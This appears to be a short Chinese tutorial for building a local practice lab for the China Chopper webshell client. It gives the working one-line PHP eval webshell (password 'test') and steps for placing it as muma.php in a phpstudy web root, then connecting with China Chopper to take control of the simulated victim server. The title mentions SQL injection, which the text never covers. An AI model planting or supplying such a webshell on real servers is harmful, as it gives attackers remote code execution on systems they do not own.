sql注入之中国菜刀环演练境搭建与测试 中国菜刀演练环境搭建

需要的工具：

1. phpstudy
2. 一句话木马php脚本 <?php @eval($_POST['test']);?>
3. 菜刀程序

1. 新建一个一句话php木马程序 muma.php，模拟攻击者，将之放入phpstudy的网站根目录

2. 模拟被攻击者启动phpstudy

3. 攻击者访问一句话木马页面(可选)

4. 打开菜刀，输入木马页面，演示环境是http://127.0.0.1/muma.php，密码是test（一句话密码中的值），环境选择PHP

 5. 成功之后，已经进了被攻击者服务器，可以模拟对被攻击者的服务器做一些骚操作了　　

到这